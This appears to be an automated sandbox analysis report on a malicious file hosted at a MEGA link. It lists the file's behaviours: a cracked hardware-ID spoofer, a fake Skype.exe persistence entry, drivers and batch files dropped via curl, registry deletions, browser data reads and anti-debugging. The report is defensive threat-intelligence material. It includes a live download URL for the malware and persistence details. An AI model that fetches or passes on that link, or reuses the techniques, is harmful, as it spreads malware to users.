Analysis Overview
Threat Level: Known bad
The file https://mega.nz/file/QskTGapC#4yGsvZBpDx4vIyIwmA-0hV5EJTEWXyyyeejW7NKL0XQ was found to be: Known bad.
Malicious Activity Summary
Cerber
Enumerates VirtualBox DLL files
Stops running service(s)
Downloads MZ/PE file
Sets file to hidden
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
Themida packer
Maps connected drives based on registry
Enumerates connected drives
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Drops file in Windows directory
Enumerates physical storage devices
Runs ping.exe
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: LoadsDriver
Checks SCSI registry key(s)
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Delays execution with timeout.exe
Runs net.exe
Modifies registry class
Suspicious use of SendNotifyMessage
NTFS ADS
Gathers network information
Kills process with taskkill
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported: 2024-07-08 17:21
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-07-08 17:21
Reported: 2024-07-08 17:26
Platform: win10v2004-20240708-en
Max time kernel: 244s
Max time network: 227s
Command Line
Signatures
Cerber
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Mutant created | AFUWIN.{5b5b8120-cd0e-11d9-b61b-0001294c3bd8} | C:\Windows\AMIDEWINx64.EXE | N/A |
Enumerates VirtualBox DLL files
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\windows\system32\vboxhook.dll | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
| File opened (read-only) | C:\windows\system32\vboxmrxnp.dll | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\KreYzePermSpoofer_cracked\KreYzePermSpoofer_cracked.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Skype.sfx.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Service Host: SysMain = "C:\\Users\\Admin\\SolaraTab\\Skype.exe" | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\DevManView.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\DriveCleanup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count | C:\Windows\DevManView.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Windows\DevManView.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum | C:\Windows\DevManView.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\DevManView.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" | C:\Windows\DevManView.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\segwindrv.cat | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DevManView.exe | N/A |
| File created | C:\Windows\serials.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\Spoofer.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\Volumeid64.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\output.txt | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\AMIDEWINx64.EXE | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\DevManView.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\segwindrvx64.sys | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\Taskkill_clean.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\gen.py | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\kreyzecleaner.exe | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\DeviceCleanupCmd.exe | N/A |
| File created | C:\Windows\devcon.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\AMIFLDRV64.SYS | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\DriveCleanup.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\python310._pth | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\sidchg64-3.0h.exe | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\backgroundcleaner.bat | C:\Windows\system32\curl.exe | N/A |
| File created | C:\Windows\DeviceCleanupCmd.exe | C:\Windows\system32\curl.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0007 | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Address | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGuid | C:\Windows\DevManView.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\DevManView.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceReported | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 | C:\Windows\DevManView.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0018 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29} | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\DeviceDesc | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ClassGUID | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGuid | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LocationInformation | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\DevManView.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002\Device Parameters | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912} | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\UpperFilters | C:\Windows\DevManView.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2} | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\DevManView.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGuid | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\DevManView.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000C | C:\Windows\DevManView.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ClassGUID | C:\Windows\DevManView.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM | C:\Windows\DevManView.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000 | C:\Windows\DevManView.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ | C:\Windows\DevManView.exe | N/A |
| Delete value | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0006\ | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\000C | C:\Windows\DeviceCleanupCmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 | C:\Windows\DevManView.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM | C:\Windows\DevManView.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\DevManView.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065 | C:\Windows\DevManView.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\Downloads\FileGrab.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3310979990-555183016-1244931625-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\Downloads\FileGrab.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 586836.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\FileGrab.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Skype.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\KreYzePermSpoofer_cracked.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/QskTGapC#4yGsvZBpDx4vIyIwmA-0hV5EJTEWXyyyeejW7NKL0XQ
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca019ab58,0x7ffca019ab68,0x7ffca019ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2212 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2876 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2892 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4404 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x460 0x494
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4668 --field-trial-handle=1840,i,11115747467786919129,684461709269073904,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
